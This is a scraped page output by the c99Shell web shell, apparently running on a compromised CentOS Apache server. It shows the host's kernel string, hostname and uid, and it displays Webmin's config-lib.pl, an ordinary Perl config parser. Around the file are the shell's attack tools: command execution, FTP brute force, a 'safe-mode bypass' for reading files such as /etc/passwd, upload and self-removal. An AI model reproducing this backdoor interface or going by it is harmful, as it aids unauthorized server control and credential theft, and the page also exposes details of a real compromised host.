!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config-lib.pl (8.98 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
# config-lib.pl
# Common functions for parsing config.info files
# Each module has a number of configurable parameters (stored in the config and
# config-* files in the module directory). Descriptions and possible values for
# each option are stored in the file config.info in the module directory.
# Each line of config.info looks like
# name=desc,type[,options]
#  desc - A description of the parameter
#  type - Possible types (and options) are
#    0 - Free text
#    1 - One of many (options are possibilities)
#    2 - Many of many (options are possibilities)
#    3 - Optional free text
#    4 - Like 1, but uses a pulldown menu
#    5 - User name
#    6 - Group name
#    7 - Directory
#    8 - File
#    9 - Multiline text
#    10 - Like 1, but with free text option
#    11 - Section header
#    12 - Password free text, with don't change option
#    13 - Like 2, but uses a list box
#    14 - Parameter is the name of a function in config_info.pl that
#         returns an alternate set of config.info values.
#    15 - Parameter is the suffix for a pair of functions with show_
#         and parse_ prepended.
#    16 - Password free text

# generate_config(&config, info-file, [module], [&can-config], [checkbox-name],
#          [only-section])
# Prints HTML for 
sub generate_config
{
my ($configref, $file, $module, $canconfig, $cbox, $section) = @_;
my %config = %$configref;

# Read the .info file in the right language
my (%info, @info_order, %einfo, $o);
&read_file($file, \%info, \@info_order);
%einfo = %info;
foreach $o (@lang_order_list) {
    &read_file("$file.$o", \%info, \@info_order);
    }
@info_order = &unique(@info_order);

if ($section) {
    # Limit to settings in one section
    @info_order = &config_in_section($section, \@info_order, \%info);
    }

# Show the parameter editors
foreach my $c (@info_order) {
    my $checkhtml;
    if ($cbox) {
        # Show checkbox to allow configuring
        $checkhtml = &ui_checkbox($cbox, $c, "",
                      !$canconfig || $canconfig->{$c});
        }
    else {
        # Skip those not allowed to be configured
        next if ($canconfig && !$canconfig->{$c});
        }
    my @p = split(/,/, $info{$c});
    my @ep = split(/,/, $einfo{$c});
    if (scalar(@ep) > scalar(@p)) {
        push(@p, @ep[scalar(@p) .. @ep-1]);
        }
    if ($p[1] == 14) {
        $module || &error($text{'config_ewebmin'});
        &foreign_require($module, "config_info.pl");
        my @newp = &foreign_call($module, $p[2], @p);
        $newp[0] ||= $p[0];
        @p = @newp;
        }
    if ($p[1] == 11) {
        # Title row
        print &ui_table_row(undef, "<b>$p[0]</b>", 2, [ undef, $tb ]);
        next;
        }
    if ($p[1] == 16 && $gconfig{'config_16_insecure'}) {
        # Don't allow mode 16
        $p[1] = 12;
        }
    my $label;
    if ($module && -r &help_file($module, "config_$c")) {
        $label = $checkhtml." ".
                 &hlink($p[0], "config_$c", $module);
        }
    else {
        $label = $checkhtml." ".$p[0];
        }
    my $field;
    if ($p[1] == 0) {
        # Text value
        $field = &ui_textbox($c, $config{$c}, $p[2] || 40, 0, $p[3]).
             " ".$p[4];
        }
    elsif ($p[1] == 1) {
        # One of many
        my $len = 0;
        for(my $i=2; $i<@p; $i++) {
            $p[$i] =~ /^(\S*)\-(.*)$/;
            $len += length($2);
            }
        my @opts;
        for($i=2; $i<@p; $i++) {
            $p[$i] =~ /^(\S*)\-(.*)$/;
            push(@opts, [ $1, $2.($len > 50 ? "<br>" : "") ]);
            }
        $field = &ui_radio($c, $config{$c}, \@opts);
        }
    elsif ($p[1] == 2) {
        # Many of many
        my %sel;
        map { $sel{$_}++ } split(/,/, $config{$c});
        for($i=2; $i<@p; $i++) {
            $p[$i] =~ /^(\S*)\-(.*)$/;
            $field .= &ui_checkbox($c, $1, $2, $sel{$1});
            }
        }
    elsif ($p[1] == 3) {
        # Optional value
        my $none = $p[2] || $text{'config_none'};
        $field = &ui_opt_textbox($c, $config{$c}, $p[3] || 20, $none,
                     $p[6], 0, undef, $p[4])." ".$p[5];
        }
    elsif ($p[1] == 4) {
        # One of many menu
        my @opts;
        for($i=2; $i<@p; $i++) {
            $p[$i] =~ /^(\S*)\-(.*)$/;
            push(@opts, [ $1, $2 ]);
            }
        $field = &ui_select($c, $config{$c}, \@opts);
        }
    elsif ($p[1] == 5) {
        # User chooser
        if ($p[2]) {
            $field = &ui_radio($c."_def", $config{$c} ? 0 : 1,
                       [ [ 1, $p[2] ], [ 0, " " ] ]);
            }
        if ($p[3]) {
            $field .= &ui_textbox($c, $config{$c}, 30)." ".
                  &user_chooser_button($c, 1);
            }
        else {
            $field .= &unix_user_input($c, $config{$c});
            }
        }
    elsif ($p[1] == 6) {
        # Group chooser
        if ($p[2]) {
            $field = &ui_radio($c."_def", $config{$c} ? 0 : 1,
                       [ [ 1, $p[2] ], [ 0, " " ] ]);
            }
        if ($p[3]) {
            $field .= &ui_textbox($c, $config{$c}, 30)." ".
                  &group_chooser_button($c, 1);
            }
        else {
            $field .= &unix_group_input($c, $config{$c});
            }
        }
    elsif ($p[1] == 7) {
        # Directory chooser
        $field = &ui_textbox($c, $config{$c}, 40)." ".
             &file_chooser_button($c, 1);
        }
    elsif ($p[1] == 8) {
        # File chooser
        $field = &ui_textbox($c, $config{$c}, 40)." ".
             &file_chooser_button($c, 0);
        }
    elsif ($p[1] == 9) {
        # Text area
        my $cols = $p[2] || 40;
        my $rows = $p[3] || 5;
        my $sp = $p[4] ? eval "\"$p[4]\"" : " ";
        $field = &ui_textarea($c, join("\n", split(/$sp/, $config{$c})),
                      $rows, $cols);
        }
    elsif ($p[1] == 10) {
        # Radios with freetext option
        my $len = 20;
        for(my $i=2; $i<@p; $i++) {
            if ($p[$i] =~ /^(\S*)\-(.*)$/) {
                $len += length($2);
                }
            else {
                $len += length($p[$i]);
                }
            }
        my $fv = $config{$c};
        my @opts;
        for(my $i=2; $i<@p; $i++) {
            ($p[$i] =~ /^(\S*)\-(.*)$/) || next;
            push(@opts, [ $1, $2.($len > 50 ? "<br>" : "") ]);
            $fv = undef if ($config{$c} eq $1);
            }
        push(@opts, [ "free", $p[$#p] !~ /^(\S*)\-(.*)$/ ? $p[$#p]
                                 : " " ]);
        $field = &ui_radio($c, $fv ? "free" : $config{$c}, \@opts)." ".
             &ui_textbox($c."_free", $fv, 20);
        }
    elsif ($p[1] == 12) {
        # Password field
        $field = &ui_radio($c."_nochange", 1,
                   [ [ 1, $text{'config_nochange'} ],
                     [ 0, $text{'config_setto'} ] ])." ".
             &ui_password($c, undef, $p[2] || 40, 0, $p[3]);
        }
    elsif ($p[1] == 13) {
        # Multiple selections from menu
        my @sel = split(/,/, $config{$c});
        my @opts;
        for($i=2; $i<@p; $i++) {
            $p[$i] =~ /^(\S*)\-(.*)$/;
            push(@opts, [ $1, $2 ]);
            }
        $field = &ui_select($c, \@sel, \@opts, 5, 1);
        }
    elsif ($p[1] == 15) {
        # Input generated by function
        $module || &error($text{'config_ewebmin'});
        &foreign_require($module, "config_info.pl");
        $field = &foreign_call($module, "show_".$p[2],
                       $config{$c}, @p);
        }
    elsif ($p[1] == 16) {
        # Password free text
        $field = &ui_password($c, undef, $p[2] || 40, 0, $p[3]);
        }
    $label = "<a name=$c>$label</a>";
    print &ui_table_row($label, $field, 1, [ "width=30% nowrap" ]);
    }
}

# parse_config(&config, info-file, [module], [&canconfig], [section])
# Updates the specified configuration with values from %in
sub parse_config
{
my ($config, $file, $module, $canconfig, $section) = @_;

# Read the .info file
my (%info, @info_order, $o);
&read_file($file, \%info, \@info_order);
foreach $o (@lang_order_list) {
    &read_file("$file.$o", \%info, \@info_order);
    }
@info_order = &unique(@info_order);

if ($section) {
    # Limit to settings in one section
    @info_order = &config_in_section($section, \@info_order, \%info);
    }

# Actually parse the inputs
foreach my $c (@info_order) {
    next if ($canconfig && !$canconfig->{$c});
    my @p = split(/,/, $info{$c});
    if ($p[1] == 14) {
        $_[2] || &error($text{'config_ewebmin'});
        &foreign_require($_[2], "config_info.pl");
        my @newp = &foreign_call($_[2], $p[2]);
        $newp[0] ||= $p[0];
        @p = @newp;
        }
    if ($p[1] == 16 && $gconfig{'config_16_insecure'}) {
        # Don't allow mode 16
        $p[1] = 12;
        }
    if ($p[1] == 0 || $p[1] == 7 || $p[1] == 8 || $p[1] == 16) {
        # Free text input
        $config->{$c} = $in{$c};
        }
    elsif ($p[1] == 1 || $p[1] == 4) {
        # One of many
        $config->{$c} = $in{$c};
        }
    elsif ($p[1] == 5 || $p[1] == 6) {
        # User or group
        $config->{$c} = ($p[2] && $in{$c."_def"} ? "" : $in{$c});
        }
    elsif ($p[1] == 2 || $p[1] == 13) {
        # Many of many
        $in{$c} =~ s/\0/,/g;
        $config->{$c} = $in{$c};
        }
    elsif ($p[1] == 3) {
        # Optional free text
        if ($in{$c."_def"}) { $config->{$c} = ""; }
        else { $config->{$c} = $in{$c}; }
        }
    elsif ($p[1] == 9) {
        # Multilines of free text
        my $sp = $p[4] ? eval "\"$p[4]\"" : " ";
        $in{$c} =~ s/\r//g;
        $in{$c} =~ s/\n/$sp/g;
        $in{$c} =~ s/\s+$//;
        $config->{$c} = $in{$c};
        }
    elsif ($p[1] == 10) {
        # One of many or free text
        if ($in{$c} eq 'free') {
            $config->{$c} = $in{$c.'_free'};
            }
        else {
            $config->{$c} = $in{$c};
            }
        }
    elsif ($p[1] == 12) {
        # Optionally changed password
        if (!$in{"${c}_nochange"}) {
            $config->{$c} = $in{$c};
            }
        }
    elsif ($p[1] == 15) {
        # Parse custom HTML field
        $_[2] || &error($text{'config_ewebmin'});
        &foreign_require($_[2], "config_info.pl");
        $config->{$c} = &foreign_call($_[2], "parse_".$p[2],
                        $config->{$c}, @p);
        }
    }
}

# config_in_section(&section, &order, &config-info)
# Returns a list of config names that are in some section
sub config_in_section
{
my ($section, $info_order, $info) = @_;
my @new_order = ( );
my $in_section = 0;
foreach my $c (@$info_order) {
    my @p = split(/,/, $info->{$c});
    if ($p[1] == 11 && $c eq $section) {
        $in_section = 1;
        }
    elsif ($p[1] == 11 && $c ne $section) {
        $in_section = 0;
        }
    elsif ($in_section) {
        push(@new_order, $c);
        }
    }
return @new_order;
}

1;


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0146 ]--